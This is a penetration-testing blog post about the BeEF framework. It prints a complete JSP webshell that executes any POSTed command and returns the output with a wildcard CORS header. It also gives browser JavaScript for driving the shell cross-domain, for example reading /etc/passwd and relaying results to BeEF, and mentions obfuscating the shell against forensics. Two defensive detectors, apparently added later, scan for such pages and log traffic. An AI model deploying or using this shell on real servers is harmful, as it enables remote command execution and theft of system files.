Tuesday, June 18, 2013

Cross-domain communication with a JSP shell from a browser hooked with BeEF

If you're a penetration tester, you have surely played with webshells before. There are plenty of webshell examples in multiple languages (e.g. Java (JSP), ASP, ASP.NET, PHP). Most of these webshells, including the Metasploit ones, give you either a bind or reverse shell running as the web or application server user (e.g. Tomcat, Apache, IIS).

This works fine when you want to use our BeEF Bind custom shellcode to exploit compiled software (kudos to our friend Ty Miller), but what can you do if you're able to upload a webshell to the target and you want bi-directional communication with that from the hooked browser?

If your target is a Java Application Server, for instance JBoss or GlassFish (see the exploits we ported to BeEF for both of them, inside the exploit directory), you can deploy the following JSP shell I wrote for that purpose.

In the BeEF project, we're obsessed with doing bad stuff entirely from the hooked browser, using it as a beachhead for launching attacks. One thing we usually exploit is the possibility to work directly in the internal network of the hooked browser. We effectively use the browser as a pivot point for further internal network pwnage. Unlike in a normal pentest scenario, we can do this without even touching the file system or the memory of some processes.

If you're a frequent reader of our blog, you probably remember Revitalizing the Inter-Protocol Exploitation with BeEF Bind, the post I wrote after RuxCon 2012. The whole idea of the technique described in that post was to bi-directionally interact with custom shellcode from the hooked browser. Such an approach removes the need to open a reverse connection back to your attacker server, or to connect to the bind shell from a fully compromised machine (in the internal network). OS commands are sent by the hooked browser cross-domain using XMLHttpRequest, and command results are appended to the HTTP response.

Let's take a look at the code:

 <%@ page import="java.util.*,java.io.*"%>
 <%
 // needed for cross-domain communication
 response.setHeader("Access-Control-Allow-Origin", "*");
 // needed for handling text/plain data
 BufferedReader br = request.getReader();
 String line = br.readLine();
 if(line != null){
  String[] cmds = line.split("cmd=");
  // split() yields at least one element even when "cmd=" is absent,
  // so the command is only present when there are two or more
  if(cmds.length > 1){
   String cmd = cmds[1];
   try{
    //executes the command
    Process p = Runtime.getRuntime().exec(cmd);
    // reads the command output line by line
    BufferedReader pr = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String disr = pr.readLine();
    while(disr != null){
     // each output line is appended to the HTTP response
     out.println(disr);
     disr = pr.readLine();
    }
   }catch(Exception e){
    out.println(e.getMessage());
   }
  }
 }
 %>

Obviously, to defeat forensics, you might want to improve it by adding polymorphism and obfuscation, but this is currently out of scope :D

Now, in order to re-create the same behavior as the BeEF Bind shellcode, our webshell has to meet the following requirements:
  • every HTTP response must contain Access-Control-Allow-Origin: * to allow bi-directional cross-domain communication with the hooked browser;
  • the JSP page must accept a POST request (Content-type text/plain) with a cmd parameter, which holds the command that will be executed;
  • the output of the executed command must be returned in the HTTP response.
The JSP webshell satisfies all of the previous requirements, as you can read from the code. I used request.getReader() because I wanted to parse a text/plain request rather than the default application/x-www-form-urlencoded Content-type.
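From the defender's side, the three requirements above are also the fingerprint of this kind of page: a wildcard CORS header, raw body parsing through request.getReader(), and a Runtime.exec() whose output is read back. The following scanner is an added example and is not part of the BeEF project or the original post; it looks for exactly those indicators in JSP source and scores each file. The two sample fragments are constructed for the test and carry only the indicator lines, not a working page.

```python
import os
import re

# Indicators taken from the JSP shell discussed above: a wildcard CORS header,
# raw body parsing via request.getReader(), and command execution through
# Runtime.exec or ProcessBuilder whose output is read back into the response.
INDICATORS = {
    "cors_wildcard": re.compile(
        r'setHeader\s*\(\s*"Access-Control-Allow-Origin"\s*,\s*"\*"\s*\)'),
    "raw_body_read": re.compile(r'request\.getReader\s*\(\s*\)'),
    "command_exec": re.compile(
        r'Runtime\.getRuntime\s*\(\s*\)\s*\.exec\s*\(|new\s+ProcessBuilder\s*\('),
    "process_output_read": re.compile(r'\.getInputStream\s*\(\s*\)'),
}


def scan_jsp_source(source):
    """Return which indicators fire and a verdict for one JSP source text."""
    hits = {name: bool(rx.search(source)) for name, rx in INDICATORS.items()}
    if hits["command_exec"] and (hits["cors_wildcard"] or hits["raw_body_read"]):
        verdict = "high"    # command execution wired to a cross-domain-friendly endpoint
    elif hits["command_exec"]:
        verdict = "medium"  # command execution alone still deserves a look
    else:
        verdict = "none"
    return {"hits": hits, "verdict": verdict}


def scan_tree(root):
    """Walk a deployed webapp directory and report every .jsp/.jspx file that scores."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".jsp", ".jspx")):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    result = scan_jsp_source(fh.read())
                if result["verdict"] != "none":
                    findings.append((path, result["verdict"]))
    return findings


# Constructed fragment carrying only the shell's indicator lines (not a working page).
SHELL_FRAGMENT = """<%@ page import="java.util.*,java.io.*"%>
<%
response.setHeader("Access-Control-Allow-Origin", "*");
BufferedReader br = request.getReader();
Process p = Runtime.getRuntime().exec(cmd);
InputStream in = p.getInputStream();
%>"""

# Constructed benign page: reads a parameter and renders it, no process execution.
BENIGN_FRAGMENT = """<%@ page import="java.util.*"%>
<%
String name = request.getParameter("name");
out.println("Hello " + (name == null ? "guest" : name));
%>"""


if __name__ == "__main__":
    for label, src in (("shell", SHELL_FRAGMENT), ("benign", BENIGN_FRAGMENT)):
        print(label, scan_jsp_source(src))
```

Point scan_tree() at an exploded WAR or a Tomcat webapps directory. Plain pattern matching is defeated by the obfuscation the post mentions, so treat this as a first pass and pair it with deployment monitoring (new .jsp files appearing in a running webapp) rather than relying on the regexes alone.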

You can interact with the webshell cross-domain from the hooked browser with the following code:
 var uri = "http://your_target";
 var port = 8080;
 var path = "BeEF_Bind.jsp";
 var cmd = "cat /etc/passwd";
 var xhr = new XMLHttpRequest();
 xhr.onreadystatechange = function() {
   if (xhr.readyState == 4) {
     // the command output comes back in the response body
     console.log(xhr.responseText);
   }
 };
 xhr.open("POST", uri + ":" + port + "/" + path, true);
 // text/plain keeps the POST a "simple" CORS request, so no preflight is sent
 xhr.setRequestHeader("Content-Type", "text/plain");
 xhr.setRequestHeader("Accept-Language", "en");
 xhr.send("cmd=" + cmd);

The JSP shell accepts POST requests that contain cmd=<command> in the body, for instance cmd=ls, and returns the command results in the HTTP response.

As you can see from the following screenshot, the hooked page is at http://xxxker.com/beef_bind_xhr.html while the POST request sent with the previous snippet of JavaScript is sent to http://xxxvictim.com:8080/BeEF_Bind.jsp, confirming the cross-domain interaction. Obviously you want to replace the console.log line with beef.net.send() in order to send back to BeEF the command output.

BeEF Screenshot
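The exchange in the screenshot leaves a recognisable trace at the server side: a POST to a .jsp page whose Origin header names a different host, carrying a preflight-free Content-Type, answered with Access-Control-Allow-Origin: *. The detector below is an added example, not BeEF code or part of the original post. It assumes a constructed front-proxy log format (not Tomcat's default access log) in which the request Host and Origin headers, the request Content-Type and the response's Access-Control-Allow-Origin value are logged, with "-" for absent headers; the sample lines are constructed, the first one mirroring the request described above.

```python
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# Constructed log format: timestamp, client, request line, status, then the
# request Host and Origin headers, the request Content-Type and the response
# Access-Control-Allow-Origin value ("-" when a header is absent).
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) "(?P<method>[A-Z]+) (?P<path>\S+)" (?P<status>\d{3}) '
    r'host="(?P<host>[^"]*)" origin="(?P<origin>[^"]*)" '
    r'ct="(?P<ct>[^"]*)" acao="(?P<acao>[^"]*)"$'
)

# Content types that make a POST a CORS "simple request": the browser sends it
# without an OPTIONS preflight, which is why the shell accepts text/plain.
PREFLIGHT_FREE = {"text/plain", "application/x-www-form-urlencoded", "multipart/form-data"}


@dataclass
class Finding:
    ts: str
    client: str
    path: str
    origin: str
    severity: str
    reasons: tuple


def parse_line(line):
    """Parse one log line into a dict of fields, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(entry):
    """Return a Finding for a cross-origin POST to a JSP page, else None."""
    if entry["method"] != "POST" or not entry["path"].lower().endswith(".jsp"):
        return None
    if entry["origin"] == "-":
        return None  # no Origin header: not a browser cross-site request
    origin_host = urlsplit(entry["origin"]).hostname
    served_host = entry["host"].split(":")[0]
    if origin_host is None or origin_host == served_host:
        return None  # same-origin form posts are normal traffic
    reasons = ["cross-origin POST"]
    if entry["ct"].split(";")[0].strip().lower() in PREFLIGHT_FREE:
        reasons.append("preflight-free content type")
    if entry["acao"] == "*":
        reasons.append("wildcard Access-Control-Allow-Origin in response")
    # all three together is the full pattern from the post; anything less is worth a look
    severity = "high" if len(reasons) == 3 else "medium"
    return Finding(entry["ts"], entry["client"], entry["path"],
                   entry["origin"], severity, tuple(reasons))


def detect(lines):
    """Run classify() over an iterable of log lines and collect the findings."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry:
            finding = classify(entry)
            if finding:
                findings.append(finding)
    return findings


# Constructed sample log; the first line mirrors the exchange from the screenshot.
SAMPLE_LOG = [
    '2013-06-18T10:22:01Z 10.0.0.5 "POST /BeEF_Bind.jsp" 200 host="xxxvictim.com:8080" '
    'origin="http://xxxker.com" ct="text/plain" acao="*"',
    '2013-06-18T10:22:05Z 10.0.0.7 "POST /login.jsp" 302 host="xxxvictim.com:8080" '
    'origin="http://xxxvictim.com:8080" ct="application/x-www-form-urlencoded" acao="-"',
    '2013-06-18T10:22:09Z 10.0.0.9 "GET /index.jsp" 200 host="xxxvictim.com:8080" '
    'origin="-" ct="-" acao="-"',
    '2013-06-18T10:22:12Z 10.0.0.5 "POST /api.jsp" 200 host="xxxvictim.com:8080" '
    'origin="http://partner.example" ct="application/json" acao="http://partner.example"',
]


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f.severity, f.client, f.path, "<-", f.origin, "|", "; ".join(f.reasons))
```

The mitigation the same signal points to is straightforward: an application server should never emit a wildcard Access-Control-Allow-Origin on endpoints that do anything with the request body, and any .jsp that starts answering cross-origin text/plain POSTs after deployment was most likely not put there by the application's developers.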

Obviously, you can achieve the same results by porting this code to ASP, ASP.NET, PHP and any other language you want. In this way you can exclusively use the hooked browser both for exploiting the vulnerability that leads to the webshell deployment and for fully interacting with it, staying stealthier and potentially controlling a system in the hooked browser's internal network.

Have fun with it!

